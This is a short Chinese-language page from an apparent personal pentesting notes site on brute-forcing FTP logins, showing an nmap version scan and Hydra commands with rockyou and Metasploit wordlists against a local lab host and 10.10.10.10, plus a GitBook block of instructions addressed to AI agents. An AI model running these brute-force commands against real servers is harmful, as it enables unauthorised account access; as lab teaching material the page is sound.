> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/zh/ports-and-services/ftp-21/ftp-brute-force-attack.md).

# FTP - 暴力破解攻击

1. 使用以下命令 [Nmap](/zh/reconnaissance/nmap.md) 来检查 FTP 版本并查找已知漏洞：

```bash
nmap -sCV -p21 127.0.0.1
```

2. 已安装的版本是 **7.93** 并且未检测到已知漏洞。

<figure><img src="/files/9ae11001c7f88410d54c61eb0b2d0ff82543265e" alt=""><figcaption></figcaption></figure>

3. 使用以下命令进行暴力破解攻击： **Hydra**。小写 `-l` 或 `-p` 表示用户名或密码是固定的；大写 `-L` 或 `-P` 表示 Hydra 从文件中读取值。

```bash
hydra -l jordan -P /usr/share/wordlists/rockyou.txt ftp://127.0.0.1 -t 15
```

4. 找到了有效凭据。

<div data-full-width="false"><figure><img src="/files/c9d829c4676d9b1612908a1b52fcff21c09caf19" alt=""><figcaption></figcaption></figure></div>

**使用常见用户和密码词表进行 FTP 暴力破解**

{% code overflow="wrap" %}

```bash
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-frameword/data/wordlists/unix_passwords.txt 10.10.10.10. -t 4 ftp
```

{% endcode %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/zh/ports-and-services/ftp-21/ftp-brute-force-attack.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
